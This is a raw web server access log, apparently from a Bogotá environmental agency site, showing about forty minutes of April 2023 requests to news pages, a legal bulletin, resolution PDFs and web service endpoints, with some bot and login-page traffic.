181.53.12.60 - - [15/Apr/2023:07:14:37 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX18t9Q8mmLJXEvWNuELSZfFAVdstwb65wEHdpYQU1gvPlEosPp2Bg99h/gvsKy/DWNpUWuTStJL8uDafE+7a+KJRMtOIy5KDplkW37Y7lMDKJskTDvkd07I3E1+qtS76pa+LhMfJWn4NX54hv+aCMm8lHy1GiRagC9F2pJLcnR8i1uTn33UVJTzDEhjRQ8zvFTmuZb2avIULDLevCXknH9A+ATqfI8QuuFEOkEh1G611ARIGyUVsRxd768d+iIFrkV5xwEIIgCLhIm5SMgdxcD9FPRlIJx4LX1GRVEaQOOuB4SxuD4fzSP3pNcPYg3+WjnQ4L+FS43O5rAKCekfWwplWBldnc1P5T9v8NoeraGhUWEMkqBIZNWxsXMCBLMM8XPRW70RQG7LCoHqE42BwCCOKrrLrHtEBLln+Vuc6ZkNQftFGuGFbGGCrpdXW5ec5ARYazEel3ADjiw==&u=U2FsdGVkX19A5RCaDL9wXqJzZnvr8m3r7BVd5ncs010=&y=U2FsdGVkX19UGlN4iUV0PO8JDZOm8f+s3OuA4Vl/tds5TRgjX/SaqKZqQO1i5Cx4 HTTP/1.1" 200 25
181.53.12.60 - - [15/Apr/2023:07:14:37 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX19jbqBmp79A4DBNmXmRjXsuYpW229xU4AcF7bMX35nHIV6/AV0lP93z0XlD2KXBcBowAu4pHX9m4PxCJ/mDcHcNYKzcDyMpGT0++LvpGHJcL67Kz2GEdO/COWUEKZwVhrxafsBL1VSn/qEPnvOSClx6RkdN9B7+5ETH6QjQZm+nigTpdVk+bE269LWJNRcy6tolH/WdnYoDGKKLthPvLC+coSTY3JbGim0EJ5419+WR0nuh4Nz68CTQgW6J2PkYgvaz6PaTvwY/hvugKJ+4jB+F3tUU2F6Gs4LzlWpOFvPMJwu9Gbm1rJijzp2izD0Nmd3pR7fFjHWLQykiX3Gv6CpfuZhwj1vNe3Cga+W4gx0caSvhwn6hA9/3+qfdiPm+JjXXBmgd5VgWslsqc5FngCgQLtFKIqBjnzKGdEmtFL3vtG6qvX0UuqBvkbRA52czW1fIqy8aUFkzamvq8bz3AGt6iKUxUfE1C7CfLOdWJRLcFV187u018pYO&u=U2FsdGVkX19A5RCaDL9wXqJzZnvr8m3r7BVd5ncs010=&y=U2FsdGVkX19UGlN4iUV0PO8JDZOm8f+s3OuA4Vl/tds5TRgjX/SaqKZqQO1i5Cx4 HTTP/1.1" 200 25
181.53.12.60 - - [15/Apr/2023:07:14:37 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1/NHHp/v7dGjGVqmTHQPL+yaq6A/ju+2zxXu6x9V+ZWql3JY9C7t7hSBRGYDDBrtE6/dQ89GfTGnDYXxRfoMoHuSzSC/tM3QEom+DHQFP0JWwyQCDOJo3RyeWhsdk7SsXJ7upqH/iSvEtaZhrsWRibXlJFm3R6gt7CSCF9+Y2vFM12pPPsjjLtoLJXcwh11ayKBesgWNK3AXlwBBBLtXenpXXQoEwO+F0DapZj2TtMW7OLvpJhqIyjrvTLr6QaxDsrHGEVWZg1IrnWRSP+p5FH7VQ6U+uTOoCcSOb0OH4QbRCAYLwyMBg4En+X4S1SuobdwoFwSccADYJGtd1G66sCvmhJf9IMi0z4aA/uXu2294lDteug4d/g7N4R89f8zTBrOyAmxrntDXeu8JUEJ70M/tRf7z5c/+htPXgWjQbDLaXE55f5HFN/iD5JQ5kTCLPQqSbh6n9J5Og==&u=U2FsdGVkX19A5RCaDL9wXqJzZnvr8m3r7BVd5ncs010=&y=U2FsdGVkX19UGlN4iUV0PO8JDZOm8f+s3OuA4Vl/tds5TRgjX/SaqKZqQO1i5Cx4 HTTP/1.1" 200 25
201.245.192.253 - - [15/Apr/2023:07:15:03 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43322
216.245.221.92 - - [15/Apr/2023:07:15:06 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [15/Apr/2023:07:14:13 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [15/Apr/2023:07:15:03 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52326
34.90.35.236 - - [15/Apr/2023:07:17:53 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
152.203.164.144 - - [15/Apr/2023:07:18:22 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13502
152.203.164.144 - - [15/Apr/2023:07:18:24 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2017%2F HTTP/1.1" 200 465216
40.77.167.87 - - [15/Apr/2023:07:18:27 -0500] "GET /BLA/boletinlegal/Directivas/2013/Directiva%20No.%202%20del%2004%20de%20Abril%20de%202013.pdf HTTP/1.1" 200 1182671
173.252.87.7 - - [15/Apr/2023:07:19:18 -0500] "GET /participa-en-las-actividades-del-dia-mundial-de-humedales.html?fbclid=IwAR2CP4nRn6j5qOD9vdPxop0b7UqyC9CPqyZJao-F0Bkt3ZLzrw5kx2UONNM HTTP/1.1" 200 874
201.245.192.253 - - [15/Apr/2023:07:19:28 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42867
201.245.192.253 - - [15/Apr/2023:07:19:31 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43083
201.245.192.253 - - [15/Apr/2023:07:20:03 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43322
216.245.221.92 - - [15/Apr/2023:07:20:06 -0500] "HEAD / HTTP/1.1" 200 -
173.252.107.2 - - [15/Apr/2023:07:20:21 -0500] "GET /participa-en-las-actividades-del-dia-mundial-de-humedales.html HTTP/1.1" 206 874
172.22.2.4 - - [15/Apr/2023:07:20:03 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [15/Apr/2023:07:20:53 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57561
185.119.81.96 - - [15/Apr/2023:07:24:54 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.96 - - [15/Apr/2023:07:24:55 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3650
201.245.192.253 - - [15/Apr/2023:07:25:03 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43322
216.245.221.92 - - [15/Apr/2023:07:25:06 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [15/Apr/2023:07:25:53 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [15/Apr/2023:07:26:43 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57151
201.245.192.253 - - [15/Apr/2023:07:29:28 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42867
201.245.192.253 - - [15/Apr/2023:07:29:30 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43083
201.245.192.253 - - [15/Apr/2023:07:30:03 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43322
216.245.221.92 - - [15/Apr/2023:07:30:06 -0500] "HEAD / HTTP/1.1" 200 -
185.119.81.96 - - [15/Apr/2023:07:32:34 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.96 - - [15/Apr/2023:07:32:36 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3670
172.22.2.4 - - [15/Apr/2023:07:33:14 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9682
172.22.2.4 - - [15/Apr/2023:07:31:43 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [15/Apr/2023:07:33:28 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/AnalisisT-095-16.docx HTTP/1.1" 200 20284
172.22.2.4 - - [15/Apr/2023:07:33:35 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/AnalisisT-095-16.docx HTTP/1.1" 200 20284
172.22.2.4 - - [15/Apr/2023:07:32:33 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58663
201.245.192.253 - - [15/Apr/2023:07:35:02 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43322
216.245.221.92 - - [15/Apr/2023:07:35:06 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [15/Apr/2023:07:35:23 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/AnalisisT-095-16.docx HTTP/1.1" 200 20284
186.30.124.25 - - [15/Apr/2023:07:36:02 -0500] "GET /empresas-con-impacto-ambiental-positivo-unanse-a-la-edicion-2023-de-negocios-verdes-mas-cerca-de-ti.html HTTP/1.1" 200 878
172.22.2.4 - - [15/Apr/2023:07:37:33 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [15/Apr/2023:07:39:28 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42867
201.245.192.253 - - [15/Apr/2023:07:39:31 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43083
157.55.39.207 - - [15/Apr/2023:07:39:41 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/4360.pdf HTTP/1.1" 304 -
172.22.2.4 - - [15/Apr/2023:07:38:23 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57561
201.245.192.253 - - [15/Apr/2023:07:40:02 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43322
216.245.221.92 - - [15/Apr/2023:07:40:06 -0500] "HEAD / HTTP/1.1" 200 -
201.244.24.94 - - [15/Apr/2023:07:40:39 -0500] "GET / HTTP/1.1" 200 4720
201.244.24.94 - - [15/Apr/2023:07:40:40 -0500] "GET /js/url.js HTTP/1.1" 404 1294
201.244.24.94 - - [15/Apr/2023:07:40:40 -0500] "GET /favicon.ico HTTP/1.1" 404 1294
66.249.73.55 - - [15/Apr/2023:07:41:32 -0500] "-" 408 -
52.167.144.37 - - [15/Apr/2023:07:43:05 -0500] "GET /pagos-por-servicios-ambientales-hidricos-una-iniciativa-para-la-conservacion-de-este-recurso.html HTTP/1.1" 200 1006
181.53.12.60 - - [15/Apr/2023:07:44:07 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX18T/Vv4KuVDp1dBQd7SMj2X9o4+s3LjHzKq1hyPV9kLcjKSR6gCRsaBt41Gu5Kyn7CsA2Uvhi9jJtMAbUAamtcBrZlDqiyzzhM5Vy5qix3iE6WfosRpHuJCzq2ntMr7enfuexflWhHRZsm7M0Acj7a1OWgTXM+bfoBZS/Kcgv70+ZT2ttA8pTV2Nsxlq4lKCceI+CxCmRMGmZCxe1BJ1nG9fjaxbV4SWvj5iqWZ+Rc1w4OvIT2gjIyZhAIPCQpamc27QpjjcQ+BSA==&u=U2FsdGVkX19A5RCaDL9wXqJzZnvr8m3r7BVd5ncs010=&y=U2FsdGVkX19UGlN4iUV0PO8JDZOm8f+s3OuA4Vl/tds5TRgjX/SaqKZqQO1i5Cx4 HTTP/1.1" 200 26
181.53.12.60 - - [15/Apr/2023:07:44:07 -0500] "GET /kwssiamovil/sm/acme/a?s=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&u=U2FsdGVkX19A5RCaDL9wXqJzZnvr8m3r7BVd5ncs010=&y=U2FsdGVkX19UGlN4iUV0PO8JDZOm8f+s3OuA4Vl/tds5TRgjX/SaqKZqQO1i5Cx4 HTTP/1.1" 200 26
181.53.12.60 - - [15/Apr/2023:07:44:07 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1899i1KtYXTtdoJHzCQTDIf8YuztlvxswcHuT/NBQ4+spV2cxBbgJG4ZKt2o0UV0zpqRsXFBoUHgClmPzyRaSpkLzK4ZxHb9bKl+fgKdXtOLG4btqaY+vNFZHq2EbO5PMCX4+jkUjQQlAOHiiqKUihTz3Vu5e/e7Nc=&u=U2FsdGVkX19A5RCaDL9wXqJzZnvr8m3r7BVd5ncs010=&y=U2FsdGVkX19UGlN4iUV0PO8JDZOm8f+s3OuA4Vl/tds5TRgjX/SaqKZqQO1i5Cx4 HTTP/1.1" 200 26
181.53.12.60 - - [15/Apr/2023:07:44:08 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX19/wQgq7l/N4NehnTm5sGrwRWcAAdT9TJaJI8UlLwOhtts2UjwkpEQjwUt0e8RrEhdBrCRgxvyrFaLNdx/kWHEzJRNohBezNWXis7W1jsHPGIHy6+74sKRLnnZZlbCezsL1Tndkcw7DEy4vc6ecwDbnY0gxlXEajno=&u=U2FsdGVkX19A5RCaDL9wXqJzZnvr8m3r7BVd5ncs010=&y=U2FsdGVkX19UGlN4iUV0PO8JDZOm8f+s3OuA4Vl/tds5TRgjX/SaqKZqQO1i5Cx4 HTTP/1.1" 200 26
181.53.12.60 - - [15/Apr/2023:07:44:08 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX19OYRtI1EBpp0eAWEEi0YUmtg7ma5SEGh+uNgb1uTdU/SShqFcDXxPkeojwnIYopaqY3eCnCpW6y752jdmrgSvHFIrCGcU8Sv6+U3avwVR3iwvKk8G0IUVTUtRgkwvQ2Ys/C6f2ESvoGUI5bzLtIkETXGzQJNA4USI=&u=U2FsdGVkX19A5RCaDL9wXqJzZnvr8m3r7BVd5ncs010=&y=U2FsdGVkX19UGlN4iUV0PO8JDZOm8f+s3OuA4Vl/tds5TRgjX/SaqKZqQO1i5Cx4 HTTP/1.1" 200 26
181.53.12.60 - - [15/Apr/2023:07:44:08 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1/LCIUkoLgDeMM8yVMJi+a6r0UNb2OMbE4DTV/6W/sEIiv/xc8zR4leSsvowykocc6Q9ivvbJUBKxxhapspSPJcUuMBJrXMcgscrHeQEgpcwsm4SexTKWSmVakTDmXWjxiJ/tpXtnDS54fEbb0B5i4hPJAsUPZCvLxaye5jKUBACSlZMlYltVjs&u=U2FsdGVkX19A5RCaDL9wXqJzZnvr8m3r7BVd5ncs010=&y=U2FsdGVkX19UGlN4iUV0PO8JDZOm8f+s3OuA4Vl/tds5TRgjX/SaqKZqQO1i5Cx4 HTTP/1.1" 200 26
201.244.24.94 - - [15/Apr/2023:07:44:13 -0500] "POST /procesar.php HTTP/1.1" 200 1010
201.244.24.94 - - [15/Apr/2023:07:44:24 -0500] "GET /florecio-la-herrania-en-el-tropicario-distrital-una-planta-nativa-de-la-amazonia-colombiana.html HTTP/1.1" 206 935
36.88.140.187 - - [15/Apr/2023:07:44:46 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [15/Apr/2023:07:45:00 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43322
172.22.2.4 - - [15/Apr/2023:07:43:23 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [15/Apr/2023:07:45:06 -0500] "HEAD / HTTP/1.1" 200 -
69.63.184.116 - - [15/Apr/2023:07:45:09 -0500] "GET /florecio-la-herrania-en-el-tropicario-distrital-una-planta-nativa-de-la-amazonia-colombiana.html HTTP/1.1" 206 935
69.63.184.116 - - [15/Apr/2023:07:45:09 -0500] "GET /florecio-la-herrania-en-el-tropicario-distrital-una-planta-nativa-de-la-amazonia-colombiana.html HTTP/1.1" 206 935
69.63.184.1 - - [15/Apr/2023:07:45:09 -0500] "GET /florecio-la-herrania-en-el-tropicario-distrital-una-planta-nativa-de-la-amazonia-colombiana.html HTTP/1.1" 206 935
69.63.184.120 - - [15/Apr/2023:07:45:10 -0500] "GET /images/Floreci%C3%B3-la-herrania-en-el-Tropicario-del-Jard%C3%ADn-Bot%C3%A1nico.jpeg HTTP/1.1" 404 1034
69.63.184.118 - - [15/Apr/2023:07:45:11 -0500] "GET /images/Floreci\xc3\xb3-la-herrania-en-el-Tropicario-del-Jard\xc3\xadn-Bot\xc3\xa1nico.jpeg HTTP/1.1" 404 1034
69.63.184.1 - - [15/Apr/2023:07:45:12 -0500] "GET /florecio-la-herrania-en-el-tropicario-distrital-una-planta-nativa-de-la-amazonia-colombiana.html HTTP/1.1" 206 935
172.22.2.4 - - [15/Apr/2023:07:44:14 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54424
52.167.144.63 - - [15/Apr/2023:07:46:04 -0500] "GET /BLA/boletinlegal/Directivas/2016/Directiva%20No.%2004%20del%2023%20de%20Diciembre%20de%202016.pdf HTTP/1.1" 304 -
152.203.232.46 - - [15/Apr/2023:07:46:24 -0500] "GET /empresas-con-impacto-ambiental-positivo-unanse-a-la-edicion-2023-de-negocios-verdes-mas-cerca-de-ti.html HTTP/1.1" 200 878
181.54.149.132 - - [15/Apr/2023:07:46:49 -0500] "GET /florecio-la-herrania-en-el-tropicario-distrital-una-planta-nativa-de-la-amazonia-colombiana.html HTTP/1.1" 200 935
172.22.2.4 - - [15/Apr/2023:07:47:03 -0500] "GET /BLA/boletinlegal/images/screen_2.png HTTP/1.1" 304 -
172.22.2.4 - - [15/Apr/2023:07:47:41 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9682
190.27.115.203 - - [15/Apr/2023:07:47:56 -0500] "GET /caminatas-ecologicas-en-bogota-inscribete-y-participa-en-los-recorridos-de-abril.html HTTP/1.1" 200 868
161.18.221.81 - - [15/Apr/2023:07:49:46 -0500] "GET /la-secretaria-de-ambiente-ha-gestionado-14-5-toneladas-de-ropa-y-calzado-en-desuso.html HTTP/1.1" 200 869
201.245.192.253 - - [15/Apr/2023:07:49:59 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43322
216.245.221.92 - - [15/Apr/2023:07:50:06 -0500] "HEAD / HTTP/1.1" 200 -
66.249.75.156 - - [15/Apr/2023:07:50:31 -0500] "-" 408 -
172.22.2.4 - - [15/Apr/2023:07:49:13 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [15/Apr/2023:07:50:03 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53114
172.22.2.4 - - [15/Apr/2023:07:51:51 -0500] "GET /BLA/boletinlegal/styles2.css HTTP/1.1" 200 1838
172.22.2.4 - - [15/Apr/2023:07:51:51 -0500] "GET /BLA/boletinlegal/niceforms-default.css HTTP/1.1" 200 6694
172.22.2.4 - - [15/Apr/2023:07:51:51 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9682
172.22.2.4 - - [15/Apr/2023:07:51:52 -0500] "GET /BLA/boletinlegal/style.css HTTP/1.1" 200 9406
172.22.2.4 - - [15/Apr/2023:07:51:52 -0500] "GET /BLA/boletinlegal/js/ajax_actos.js HTTP/1.1" 200 1322
172.22.2.4 - - [15/Apr/2023:07:51:52 -0500] "GET /BLA/boletinlegal/niceforms.js HTTP/1.1" 200 22876
172.22.2.4 - - [15/Apr/2023:07:51:52 -0500] "GET /BLA/boletinlegal/js/lib.js HTTP/1.1" 200 6474
172.22.2.4 - - [15/Apr/2023:07:51:52 -0500] "GET /BLA/boletinlegal/js/popup.js HTTP/1.1" 200 1270
172.22.2.4 - - [15/Apr/2023:07:51:52 -0500] "GET /BLA/boletinlegal/js/jquery1.js HTTP/1.1" 200 29846
172.22.2.4 - - [15/Apr/2023:07:51:52 -0500] "GET /BLA/boletinlegal/images/cabezote%20BLEGAL.jpg HTTP/1.1" 200 118164
172.22.2.4 - - [15/Apr/2023:07:51:52 -0500] "GET /BLA/boletinlegal/images/subscribe-icon-big.png HTTP/1.1" 200 47702
172.22.2.4 - - [15/Apr/2023:07:51:52 -0500] "GET /BLA/boletinlegal/images/historia.png HTTP/1.1" 200 52775
172.22.2.4 - - [15/Apr/2023:07:51:52 -0500] "GET /BLA/boletinlegal/images/registro-usuarios.png HTTP/1.1" 200 8106
172.22.2.4 - - [15/Apr/2023:07:51:52 -0500] "GET /BLA/boletinlegal/images/green-yellow-blue-pink-th.png HTTP/1.1" 200 7394
172.22.2.4 - - [15/Apr/2023:07:51:52 -0500] "GET /BLA/boletinlegal/images/body_bg.jpg HTTP/1.1" 200 1601
172.22.2.4 - - [15/Apr/2023:07:51:52 -0500] "GET /BLA/boletinlegal/images/text.jpg HTTP/1.1" 200 568
172.22.2.4 - - [15/Apr/2023:07:51:52 -0500] "GET /BLA/boletinlegal/images/footer_bg_l.jpg HTTP/1.1" 200 776
172.22.2.4 - - [15/Apr/2023:07:51:52 -0500] "GET /BLA/boletinlegal/images/icono-email.png HTTP/1.1" 200 5544
172.22.2.4 - - [15/Apr/2023:07:51:52 -0500] "GET /BLA/boletinlegal/images/menu_bg.jpg HTTP/1.1" 200 620
172.22.2.4 - - [15/Apr/2023:07:51:52 -0500] "GET /BLA/boletinlegal/images/menu_lft.gif HTTP/1.1" 200 1713
172.22.2.4 - - [15/Apr/2023:07:51:52 -0500] "GET /BLA/boletinlegal/images/footer_bg.jpg HTTP/1.1" 200 586
172.22.2.4 - - [15/Apr/2023:07:51:52 -0500] "GET /BLA/boletinlegal/images/menu_rght.gif HTTP/1.1" 200 1627
172.22.2.4 - - [15/Apr/2023:07:51:52 -0500] "GET /BLA/boletinlegal/images/bg_top.jpg HTTP/1.1" 200 522
172.22.2.4 - - [15/Apr/2023:07:51:52 -0500] "GET /BLA/boletinlegal/images/hover.jpg HTTP/1.1" 200 640
172.22.2.4 - - [15/Apr/2023:07:51:52 -0500] "GET /BLA/boletinlegal/images/tel.png HTTP/1.1" 200 14477
172.22.2.4 - - [15/Apr/2023:07:51:52 -0500] "GET /BLA/boletinlegal/img/select-left.png HTTP/1.1" 200 263
172.22.2.4 - - [15/Apr/2023:07:51:52 -0500] "GET /BLA/boletinlegal/img/0.png HTTP/1.1" 200 110
172.22.2.4 - - [15/Apr/2023:07:51:52 -0500] "GET /BLA/boletinlegal/img/button-right.png HTTP/1.1" 200 57878
172.22.2.4 - - [15/Apr/2023:07:51:52 -0500] "GET /BLA/boletinlegal/img/button.png HTTP/1.1" 200 43241
172.22.2.4 - - [15/Apr/2023:07:51:52 -0500] "GET /BLA/boletinlegal/img/select-right.png HTTP/1.1" 200 44019
172.22.2.4 - - [15/Apr/2023:07:51:52 -0500] "GET /BLA/boletinlegal/img/button-left.png HTTP/1.1" 200 57071
172.22.2.4 - - [15/Apr/2023:07:51:52 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1326
172.22.2.4 - - [15/Apr/2023:07:52:04 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=&usuario=&sector=SILVICULTURA&fecha=2023&resuelve= HTTP/1.1" 200 18519
172.22.2.4 - - [15/Apr/2023:07:52:04 -0500] "GET /BLA/boletinlegal/images/pdf.gif HTTP/1.1" 200 567
172.22.2.4 - - [15/Apr/2023:07:52:04 -0500] "GET /BLA/boletinlegal/images/background.gif HTTP/1.1" 200 -
181.56.240.253 - - [15/Apr/2023:07:52:23 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202023/0179.pdf HTTP/1.1" 200 2812616
181.56.240.253 - - [15/Apr/2023:07:52:23 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202023/0179.pdf HTTP/1.1" 206 1447283
192.241.209.67 - - [15/Apr/2023:07:52:41 -0500] "MGLNDD_190.27.245.106_80" 501 953
181.56.240.253 - - [15/Apr/2023:07:53:02 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202023/0179.pdf HTTP/1.1" 206 1
181.56.240.253 - - [15/Apr/2023:07:53:02 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202023/0179.pdf HTTP/1.1" 206 2770898
181.56.240.253 - - [15/Apr/2023:07:53:02 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202023/0179.pdf HTTP/1.1" 206 1447283
199.16.157.182 - - [15/Apr/2023:07:53:27 -0500] "GET /florecio-la-herrania-en-el-tropicario-distrital-una-planta-nativa-de-la-amazonia-colombiana.html HTTP/1.1" 200 935
199.16.157.180 - - [15/Apr/2023:07:53:27 -0500] "GET /images/Floreci%C3%B3-la-herrania-en-el-Tropicario-del-Jard%C3%ADn-Bot%C3%A1nico.jpeg HTTP/1.1" 404 1034
181.54.149.132 - - [15/Apr/2023:07:54:44 -0500] "GET /florecio-la-herrania-en-el-tropicario-distrital-una-planta-nativa-de-la-amazonia-colombiana.html HTTP/1.1" 206 935
201.245.192.253 - - [15/Apr/2023:07:54:58 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43322
216.245.221.92 - - [15/Apr/2023:07:55:06 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [15/Apr/2023:07:56:20 -0500] "GET /BLA/boletinlegal/js/ajax_normativa.js HTTP/1.1" 200 1154
172.22.2.4 - - [15/Apr/2023:07:56:20 -0500] "GET /BLA/boletinlegal/normativa.php HTTP/1.1" 200 8343
172.22.2.4 - - [15/Apr/2023:07:55:03 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
